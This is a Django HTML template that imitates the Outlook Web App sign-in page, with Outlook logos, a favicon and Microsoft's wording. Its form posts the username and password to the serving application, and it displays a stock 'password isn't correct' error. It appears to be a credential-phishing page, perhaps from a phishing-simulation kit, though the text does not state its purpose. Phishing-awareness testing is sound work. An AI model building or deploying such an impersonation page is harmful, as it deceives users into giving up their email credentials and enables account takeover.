{% load static %}
<!DOCTYPE html>

<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Outlook Web App login</title>
    <link href="{% static 'css/main.css' %}" rel="stylesheet">
    <link href="{% static 'css/style.css' %}" rel="stylesheet">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="icon" type="image/x-icon" href="{% static 'img/outlook.ico' %}">
</head>
<body>
<div class="container-fluid" style="margin:0 auto">
    <div class="row">
        <div class="col-2 text-center mobile" style="height:100vh;background-color:#0072CC;">
            <img src="{% static 'img/ou.png' %}" style="width:50%;height:50%;object-fit:contain;" />
        </div>
        <div class="col-10 login mobile-form" style="padding-top:10rem;">
                <div class="container">
                    <img src="{% static 'img/ou_l.png' %}" style="width:90%;object-fit:contain;">
                </div>
                <div class="container" style="text-align:left">
                    <form class="form" method="post" action="">
                        {% csrf_token %}
                    {{form.as_p}}
                    {% if messages  %}
                        {% for m in messages %}
                        <p style="font-size:12px;color:red;">The user name or password you entered isn't correct. Try entering it again.</p>
                        {% endfor%}
                    {% endif %}
                    <p style="font-size:12px;color:red;">Warning: By selecting this option, you confirm that this computer complies with your organization's security policy.</p>
                    <button type="submit" class="button" >
                    <svg xmlns="http://www.w3.org/2000/svg" width="26" height="26" fill="#0072c6" class="bi bi-arrow-right-circle" viewBox="0 0 16 16">

                      <path fill-rule="evenodd" d="M1 8a7 7 0 1 0 14 0A7 7 0 0 0 1 8zm15 0A8 8 0 1 1 0 8a8 8 0 0 1 16 0zM4.5 7.5a.5.5 0 0 0 0 1h5.793l-2.147 2.146a.5.5 0 0 0 .708.708l3-3a.5.5 0 0 0 0-.708l-3-3a.5.5 0 1 0-.708.708L10.293 7.5H4.5z"/>
                    </svg>
                        sign in
                    </button>
                    </form>


                </div>





        </div>
    </div>

</div>

</body>
</html>